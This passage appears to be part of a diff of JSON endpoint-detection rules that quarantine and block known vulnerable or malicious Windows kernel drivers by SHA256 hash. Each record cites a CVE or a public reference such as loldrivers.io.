"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155701Z", + "creation_date": "2026-03-23T11:45:31.155703Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155708Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d687eab6e49d5157a820ca9a4788a2cb594c8311a36d0f6b53330adbbd2ed10", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7ea84e6-c805-5533-9402-7e040d02d78f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810380Z", + "creation_date": "2026-03-23T11:45:31.810382Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810387Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63099e522e7971f91099d1d050e054399d21920b3d843b0553ea054d5488deb1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7f9fd54-2ac6-53a8-8900-220e3a0f8acb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608138Z", + "creation_date": "2026-03-23T11:45:29.608140Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f4a442256f785969f8e1325bb98612da17528e76110bb8112cae78e3edcd547", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e810845b-3b8d-5846-ac21-20148bc42b6f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974069Z", + "creation_date": "2026-03-23T11:45:29.974092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974098Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec5fac0b6bb267a2bd10fc80c8cca6718439d56e82e053d3ff799ce5f3475db5", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e811aeb0-5f41-5992-ba3a-e03f8322daa6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827311Z", + "creation_date": "2026-03-23T11:45:31.827313Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827319Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "697df9f2cbd118088a334949a493bb51f5fc6354aa62d61e4143a5d1debbd3c0", + "comment": "Vulnerable 
Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8125746-588c-5e5f-b989-c965156d098a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143060Z", + "creation_date": "2026-03-23T11:45:32.143062Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f8812611cf7120e89e769cc908fabc0c9e49b27fded8dde6a3de51d9ce34f09", + "comment": "Vulnerable Kernel Driver (aka msr.sys) [https://www.loldrivers.io/drivers/ee6fa2de-d388-416c-862d-24385c152fad/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e81ffaaa-455f-5271-b5ea-0e77a57f8257", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.830274Z", + "creation_date": "2026-03-23T11:45:31.830276Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830281Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95bbc68071b6918824caee3737b1810ee48ac96940de4ff18dd237ea6aa36039", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e835c41b-1d2a-5ea6-98d8-4c5e4bb56e7d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621616Z", + "creation_date": "2026-03-23T11:45:29.621618Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621624Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7860e110f7a292d621006b7208a634504fb5be417fd71e219060381b9a891e6", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"e849a909-7f91-548a-a58b-819972b77812", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144707Z", + "creation_date": "2026-03-23T11:45:32.144709Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144715Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8da085332782708d8767bcace5327a6ec7283c17cfb85e40b03cd2323a90ddc2", + "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e84a8e81-2ed7-5760-b592-6e09412e23ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.478983Z", + "creation_date": "2026-03-23T11:45:31.478987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.478997Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "569b0bba367c867eb1236fe0a901dbebef28bf1ecd5c9a1191c6b8189e929937", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e864ad60-26d2-508a-8ce3-1a24485ee528", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808486Z", + "creation_date": "2026-03-23T11:45:31.808488Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808494Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "671f71f285dcbb8320d7516b52e0bc7842b0a218a0102a516780cb64715ab300", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e865fde4-baf7-54d8-a30e-9a46face5248", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159067Z", + "creation_date": "2026-03-23T11:45:31.159069Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159074Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff3f0bb2e78344e83dcddd3c7d327f2014724b0ded0c2c3f0de6bdfe8c134847", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e87baac3-a164-5029-82f1-a0e2f001d2ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475159Z", + "creation_date": "2026-03-23T11:45:30.475162Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475171Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e", + "comment": "Vulnerable Kernel Driver (aka bs_rcio64.sys) [https://www.loldrivers.io/drivers/cacf18a5-6d7d-4a63-92d4-bda386a3da18/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8973e79-e57d-5534-8f85-168cd87bbb18", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821183Z", + "creation_date": "2026-03-23T11:45:31.821186Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821195Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf79ce5b627fa50bb6f20c54edc8cbfa258bd0614efd921976310cf1d395e80b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e898c861-d93c-5962-a9e4-9a570f592ff5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144147Z", + "creation_date": "2026-03-23T11:45:32.144149Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144154Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44ebb0f534e7cdfec06d5234358d219798a313219b214d72aa23afc5a57d7ea9", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8a348f0-0072-54cd-a187-ecbd9bfcda1f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611010Z", + "creation_date": "2026-03-23T11:45:29.611012Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611018Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "55e3b977402be076bfafe332a3fb29ddb6b02edf932d02e963df09adbe89eb91", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8a79c99-57d0-55ec-9340-ab168040d4c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830385Z", + "creation_date": "2026-03-23T11:45:30.830387Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830393Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87f8155a5a32e2623d124f29e7391bfb2971b8abe02786066917b950af70a0f9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8aa54b9-d19b-588a-a0e9-35113f2afd58", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474580Z", + "creation_date": "2026-03-23T11:45:31.474585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474596Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5e5dd268969e13f3af9bdb3c0e7b9a29746d3ae03adefe5457c1d96677395692", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8be7a3f-aaa8-5389-9542-07d0d46cda35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816678Z", + "creation_date": "2026-03-23T11:45:31.816682Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816691Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6594141aa7f1da404985aa30bb9b063624195dcd3068d73926ec7170d2ec9e82", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8d4232a-8ca2-5610-ab44-ff9811a36c4d", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483244Z", + "creation_date": "2026-03-23T11:45:31.483248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483257Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "32d0ad55f7796709b8c48a94aa442f1d9b00d1352a5f211ad306be35f8b0c807", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8da4589-d1f2-5eaf-b846-18d806d03117", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810485Z", + "creation_date": "2026-03-23T11:45:31.810487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810493Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "78d1dfb77ee3705dfb820e03e6b035dbc67a85ffbffc889d92b3b8e9f9d123a3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8ed23f2-7b84-5214-b2c8-fc17aef4df81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453636Z", + "creation_date": "2026-03-23T11:45:30.453639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "75822137b0934c2146c789d9f6e52da4de4a191698b68819d6d4b0845bbc34ed", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8ee87ab-94f6-530c-b942-1eecde0a0529", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.492091Z", + "creation_date": "2026-03-23T11:45:31.492093Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.492098Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ec4994e72d5712ef2fb4b9c5e1807393f9e9e98e38e479c6f5f66317c6bbc1e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8eef2d4-d016-5a57-81b9-9e670787bfac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149671Z", + "creation_date": "2026-03-23T11:45:31.149674Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149682Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1502ec276f542cf65e2d6b5159a04ee611ed06c96a0a51a7ab29985cc5634386", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e8fc1717-973f-50a1-94e9-8a87f6d289bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985575Z", + "creation_date": "2026-03-23T11:45:29.985577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 